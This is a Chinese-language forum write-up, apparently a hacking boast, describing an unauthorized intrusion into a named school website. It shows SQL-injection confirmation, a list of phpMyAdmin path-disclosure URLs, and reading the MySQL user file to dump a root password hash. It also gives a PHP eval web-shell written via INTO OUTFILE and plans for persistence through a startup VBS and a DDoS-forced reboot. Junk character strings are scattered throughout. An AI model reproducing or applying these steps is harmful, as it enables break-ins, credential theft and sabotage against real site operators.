第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏! t# j3 C) w: b) i2 C) ?0 t
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
* z6 T5 Z( L* ?3 \: {" h9 m, w: b
$ b: O% `: o+ ^1 h4 c
) r4 t8 M( g2 x! e& F3 X+ ]/ Q7 R9 r
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 $ |* |* b* p8 y5 P1 r; f3 ]
+ }5 f' j. j8 b那么想可以直接写入shell ,getshell有几个条件:
- r* v, U7 P& u1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
0 d1 N( @6 W" F# K. N+ K6 L
1 ~3 R8 H" K, Q. X: @2 Z/ x试着爆绝对路径: " I1 B* V* ]: _- ]. J% l1 G- [6 N
1./phpMyAdmin/index.php?lang[]=1 ) n* n* n9 D- V7 A
2./phpMyAdmin/phpinfo.php
! s ^) M, B2 b& Q3./load_file()
& L" O& l& n! F* P' m7 w4./phpmyadmin/themes/darkblue_orange/layout.inc.php
: Z2 b6 x# O3 q8 |+ R5./phpmyadmin/libraries/select_lang.lib.php
( |0 U" [- K ~: _ d4 b( F6./phpmyadmin/libraries/lect_lang.lib.php 5 l. d9 n% H7 F
7./phpmyadmin/libraries/mcrypt.lib.php ! n2 g/ r% I# T; j7 U
8./phpmyadmin/libraries/export/xls.php
* F; s8 m5 D- z7 c* J2 @% T
: p7 e, m4 s* R9 F( g均不行........................... 4 T0 y2 Y7 A. G' X J: M, n
% j7 e8 c J9 N1 E/ }3 Z6 L: t8 D) _
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 7 _: N3 G9 ^& ]( p" V! [& @
$ c$ F: s5 {6 W
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 N, {5 p: W, G( \
4 J- r |( Q O2 j* R2 W7 m
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 * F% |! \) ?- p: B+ G
/ x* R# r0 V H2 C. H敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
3 {, `4 B& A) z9 l1 n x! \4 {, y; J9 |1 F
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
* G2 E$ G+ w- t$ I1 E7 A* X ?! l' e T: q% R, R
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
- p% t, H* l9 U- K4 T: F+ |3 L
3 M1 i' g/ T( {) P+ _自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 1 `! e9 A' m' S7 |. l
+ `$ q* a) Z0 T9 P
成功读到root密码:
9 {$ c; t5 R# c8 ]8 ^
2 _% L I3 a; O4 ^, E/ ^: W2 ?17---- r(0072) 2 j. P2 z5 b+ U1 p/ p" {
18---- o(006f) & ~% u; q+ _- L4 @! ?+ F) K; z
19---- o(006f) ) \. T$ E# `2 s8 @% \! S
20---- t(0074)
6 w# w8 T4 Z- |) l' p+ P( t6 d' p0 k21---- *(002a)
8 `3 q) ~. w; c/ \0 g22---- 8(0038)
: L, l4 F/ w( K23---- 2(0032) ) M( m1 S0 Q/ o# J( z+ E
24---- E(0045)
% I5 a; d9 S9 \4 o: _* }6 ?0 f25---- 1(0031) $ @9 X. I6 n6 }) n' w
26---- C(0043) $ ~1 t& L7 Q/ g+ @0 y* k
27---- 5(0035)
y) l% s% ], i! c28---- 8(0038) 2 Q) j n$ _" w2 {6 ^: U Z3 A& S
29---- 2(0032) " w/ U$ d6 o. u( i- b1 Z
30---- 8(0038)
. H5 E0 z) K8 `31---- A(0041) . V, g1 k4 `& l: p2 ?0 o$ f1 b
32---- 9(0039) $ ~- K$ R O( d2 `2 U0 ^
33---- B(0042) : ^& C4 C! ^5 [& l/ N1 ]0 M5 \
34---- 5(0035)
4 k/ h4 ^' G( n, z9 f7 j9 v35---- 4(0034) 0 S7 s* A* k& [+ C9 T8 v8 X
36---- 8(0038) * d! S# S- e [$ e2 ?
37---- 6(0036) 8 J) p/ l6 a% m& y
38---- 4(0034)
2 ^3 q+ d! |" I W' I% Y/ V39---- 9(0039)
0 q) w6 h2 H. G& J- u40---- 1(0031) 3 F% b; @$ }# j/ L8 r7 h
41---- 1(0031)
m% {8 d# r$ n& r; v42---- 5(0035) 3 m1 ^0 }5 g3 g* p e
43---- 3(0033) . o% u9 E* \2 Z' g8 d
44---- 5(0035)
% v3 ?8 z+ ~0 F45---- 9(0039)
+ J: k% Y% N0 ^46---- 8(0038) 4 q$ ?# V8 ?& f1 d* f- o7 l+ w
47---- F(0046) 1 V8 i/ X" e5 K' K+ X
48---- F(0046)
, r: l5 B U$ Y5 @6 @# `4 o& X' N49---- 4(0034) 1 p! d a: }# Z# C& m, F
50---- F(0046)
! [: X- z( E+ Y& k2 _51---- 0(0030)
# i) \( ~1 D3 s3 Q4 J7 T52---- 3(0033) 8 x2 a$ l9 @8 @2 t( ]* v$ }" y
53---- 2(0032)
: k# K# F2 `- G4 S5 Z54---- A(0041) / v5 q- O5 ~4 ~$ P9 {! s
55---- 4(0034) * Y. e. R/ p$ X. q; X
56---- A(0041)
! R+ h$ e8 F2 a$ Y57---- B(0042)
0 l: H0 o$ l7 }% R58---- *(0044)
8 s# P# u* v1 l. ]. A59---- *(0035) & v: f( o& G/ f* T2 }! F
60---- *(0041)
# t+ C# A# }/ L e61---- *0032) . o7 R5 r4 P$ z# V
* d5 _4 J3 r# b
解密后成功登陆phpmyamin , R$ w* M. V4 V2 G0 ~; o" x5 }
- g" F2 \6 w+ n0 ?& h7 U% Z7 W$ E s+ g: n9 c' t7 `$ F( w3 O
j. d5 D3 _) d0 x* b! u* L$ N
* b' _& x% ?. b% U) A# n) I
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
! o, i3 d0 Z1 E- y6 X: U# q6 B0 Y3 [3 V( f
成功执行,拿下shell,菜刀连接: # F) j% y l3 ]9 V: o
/ ?$ i2 c/ i5 o, m) v
服务器不支持asp,aspx,php提权无果................... ' u I, t$ b U3 d4 V* h
, d# ] G4 D7 v但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
9 y7 {" Z. K, ^ e7 _8 d: |服务器上已经有个隐藏帐号了 ) Y( i( ~/ T" \' M U4 g
别名 administrators8 M6 g0 M- D' B% E5 {, O! l' d7 n
注释 管理员对计算机/域有不受限制的完全访问权 3 ~5 L' ^/ I( a3 m" ?' W
成员
: {8 d! O. j# K-------------------------------------------------------------------------------8 S, O' q) ^" L+ n: s
admin3 R* B. }7 @7 g& g) P5 X% h9 F% k7 w9 \
Administrator) z: y+ I. z: n1 Q! x1 `! c
slipper$+ _! Q `: U- D: U' W
sqluser* D* G; ]+ n5 S
命令成功完成。 / K" d, a7 y, d
9 a7 R# m+ @/ _# n) X( G
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。8 |! i8 s$ s# s+ ~
" w, J1 }- r7 ^9 lddos服务器重启,不然就只能坐等服务器重启了...............................9 W" b4 h8 ]/ Z. L0 `; P, I
8 T5 Q8 q! o5 t8 A+ ]
; y4 ~+ }! h3 V |